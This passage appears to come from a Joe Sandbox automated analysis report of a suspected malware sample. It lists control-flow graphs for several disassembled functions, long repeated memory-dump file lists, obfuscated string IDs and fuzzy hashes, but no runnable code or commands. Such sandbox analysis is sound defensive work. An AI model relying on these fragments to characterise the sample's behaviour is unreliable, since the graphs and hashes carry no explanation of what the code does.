67f8a0-67f8bd 760->773 761->761 771 67f86d-67f870 761->771 769 67fc80-67fc95 762->769 772 67fec0-67fed5 763->772 765->754 769->769 781 67fc97-67fca2 769->781 771->760 772->772 782 67fed7-67fedf 772->782 773->773 783 67f8bf-67f8de 773->783 781->763 785 67fee2 782->785 783->729 783->732 783->733 783->734 783->735 783->736 783->737 783->739 783->740 783->741 783->742 783->743 783->744 783->746 783->747 783->748 783->749 783->751 783->753 783->754 783->756 783->757 783->762 783->763 785->785
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5c;e$>kjm$A'K)$Jg3i$S;W=$i#E%
                                                                                    • API String ID: 0-468034204
                                                                                    • Opcode ID: 789dfb012ed25b712445470c00bd2b2e23bb74d00f2accba417f2f099e1dff66
                                                                                    • Instruction ID: 769366a4562984e42833f33f101e3117d08aaada88dec5e5a60fbb80c4e1cdd2
                                                                                    • Opcode Fuzzy Hash: 789dfb012ed25b712445470c00bd2b2e23bb74d00f2accba417f2f099e1dff66
                                                                                    • Instruction Fuzzy Hash: 5312A5B4214700CFD3248F25D889FAABBB2FB45310F1A86ACD69A9F6B2D7709445CF51
                                                                                    Function 00696022 Relevance: 6.5, Strings: 5, Instructions: 224COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 787 696022-696041 788 696046-696051 787->788 788->788 789 696053-696055 788->789 790 696059-69605c 789->790 791 69605e-6960d2 790->791 792 6960d4-696108 790->792 791->790 793 69610a-69610d 792->793 794 6961bd-6961c7 793->794 795 696113-6961b8 793->795 796 6961cb-6961d6 794->796 795->793 797 6961d8 796->797 798 6961dd-6961f2 796->798 799 69629c-69629f 797->799 800 6961f9-6961ff 798->800 801 6961f4 798->801 802 6962a1 799->802 803 6962a3-6962c2 799->803 805 696208-69627b call 6b0f10 800->805 806 696201-696206 800->806 804 696285-696288 801->804 802->803 807 6962c7-6962d2 803->807 809 69628a-69628e 804->809 810 696290-696297 804->810 812 696280 805->812 806->804 807->807 811 6962d4 807->811 809->799 810->796 813 6962d6-6962d9 811->813 812->804 814 6962db-696320 813->814 815 696322-696347 813->815 814->813
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $7$7$8$W
                                                                                    • API String ID: 0-4210289531
                                                                                    • Opcode ID: 90dd7efd01cb9d1aa1595e7bd6ca4503327d4db27043c1a9f17d7c4fa049675f
                                                                                    • Instruction ID: 778f71a08b138c70f308638a770057d13477e8a7875b1bcfa4d1040b26454bb0
                                                                                    • Opcode Fuzzy Hash: 90dd7efd01cb9d1aa1595e7bd6ca4503327d4db27043c1a9f17d7c4fa049675f
                                                                                    • Instruction Fuzzy Hash: 2481E672A0C7808BD728CA3CC85539FBBD3ABD5324F1D8A6DE4E5873C2D67988058742
                                                                                    Function 006A15DC Relevance: 4.3, Strings: 3, Instructions: 561COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 823 6a15dc-6a15ec call 6a2240 826 6a176a-6a1775 823->826 827 6a15cc-6a15d4 823->827 828 6a1762-6a1765 823->828 829 6a14c3-6a14c8 823->829 830 6a15c0-6a15c3 823->830 831 6a14e5-6a1503 823->831 832 6a15ba 823->832 833 6a1999-6a19b2 call 6a5050 823->833 834 6a177c-6a1794 823->834 835 6a15f3-6a1669 call 692dd0 * 3 823->835 836 6a15b1 823->836 837 6a1551-6a156f 823->837 838 6a17b6-6a17cf 823->838 826->827 826->830 826->831 826->832 826->833 826->834 826->836 826->837 826->838 827->833 844 6a1821-6a184f 828->844 839 6a14ca-6a14d0 call 67c890 829->839 840 6a14d3-6a14d6 call 6ab7b0 829->840 830->827 842 6a1510-6a1547 831->842 861 6a19cb-6a19ff 833->861 862 6a19b4-6a19b5 833->862 846 6a17a0-6a17b2 834->846 886 6a1670-6a168f 835->886 836->832 843 6a1570-6a15aa 837->843 847 6a17d0-6a17fd 838->847 839->840 859 6a14db-6a14de 840->859 842->842 852 6a1549 842->852 843->843 855 6a15ac 843->855 850 6a1850-6a1886 844->850 846->846 854 6a17b4 846->854 847->847 856 6a17ff 847->856 850->850 860 6a1888-6a188d 850->860 852->837 857 6a1802-6a1808 854->857 855->836 856->857 864 6a180a-6a180b 857->864 865 6a181b-6a181e 857->865 859->831 859->837 866 6a188f-6a1896 860->866 867 6a18ad-6a18b0 860->867 869 6a1a00-6a1a43 861->869 868 6a19c0-6a19c9 862->868 871 6a1810-6a1819 864->871 865->844 872 6a18a0-6a18a9 866->872 873 6a18b3-6a18bc 867->873 868->861 868->868 869->869 874 6a1a45-6a1a4a 869->874 871->865 871->871 872->872 876 6a18ab 872->876 877 6a18db-6a191f 873->877 878 6a18be-6a18c1 873->878 879 6a1a4c-6a1a4d 874->879 880 6a1a5d 874->880 876->873 884 6a1920-6a195b 877->884 882 6a18d0-6a18d9 878->882 883 6a1a50-6a1a59 879->883 885 6a1a60-6a1a69 880->885 882->877 882->882 883->883 891 6a1a5b 883->891 884->884 887 6a195d-6a1962 884->887 889 6a1a7b 885->889 890 6a1a6b-6a1a6d 885->890 886->886 888 6a1691-6a1699 886->888 894 6a197d 887->894 895 6a1964-6a1968 887->895 892 6a169b-6a169f 888->892 893 6a16ad 888->893 901 6a1a7e 889->901 896 6a1a70-6a1a79 890->896 891->885 897 6a16a0-6a16a9 892->897 899 6a16b0-6a16b8 893->899 900 6a1980-6a1992 894->900 898 6a1970-6a1979 895->898 896->889 896->896 897->897 902 6a16ab 897->902 898->898 905 6a197b 898->905 903 6a16ba-6a16bb 899->903 904 6a16cb-6a16db 899->904 900->827 900->830 900->832 900->833 900->836 901->901 902->899 906 6a16c0-6a16c9 903->906 907 6a16fd-6a1700 904->907 908 6a16dd-6a16e4 904->908 905->900 906->904 906->906 910 6a1703-6a170c 907->910 909 6a16f0-6a16f9 908->909 909->909 911 6a16fb 909->911 912 6a170e-6a1715 910->912 913 6a172d 910->913 911->910 914 6a1720-6a1729 912->914 915 6a1733-6a173c 913->915 914->914 916 6a172b 914->916 917 6a174b-6a175b call 6b4320 915->917 918 6a173e-6a173f 915->918 916->915 917->826 917->827 917->828 917->830 917->831 917->832 917->833 917->834 917->836 917->837 917->838 919 6a1740-6a1749 918->919 919->917 919->919
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: >2%8$NFFV$]c\"
                                                                                    • API String ID: 0-36263332
                                                                                    • Opcode ID: 061c117fdd183f1da3430f69d0ae216213295a2a0275be2ca03c1431456db6e4
                                                                                    • Instruction ID: 95e70ba61c5fd6241d4998f11aec1d6bcdeaf2816adf21c186aa815968aa7982
                                                                                    • Opcode Fuzzy Hash: 061c117fdd183f1da3430f69d0ae216213295a2a0275be2ca03c1431456db6e4
                                                                                    • Instruction Fuzzy Hash: 29F113745047828BD7258F2AC4A0762BBE2EFA3300F2C958DC4D68F797D7799846CB61
                                                                                    Function 0067CF90 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 965 67cf90-67cfaf 966 67cfb0-67cfd3 965->966 966->966 967 67cfd5-67cfdf call 6aff20 966->967 970 67cfe5-67cfec call 6a8d10 967->970 971 67d1c4-67d1cf ExitProcess 967->971 974 67cff2-67d0a5 970->974 975 67d1bf call 6b0de0 970->975 978 67d0b0-67d0c2 974->978 975->971 978->978 979 67d0c4-67d0c7 978->979 980 67d0cd-67d101 979->980 981 67d19c-67d1a4 979->981 982 67d110-67d12d 980->982 986 67d1a6-67d1ab 981->986 987 67d1ac-67d1b3 call 67e1a0 981->987 982->982 983 67d12f-67d158 982->983 985 67d160-67d181 983->985 985->985 988 67d183-67d196 985->988 986->987 987->975 992 67d1b5 call 680b90 987->992 988->981 994 67d1ba call 67fa70 992->994 994->975
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0067D1C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
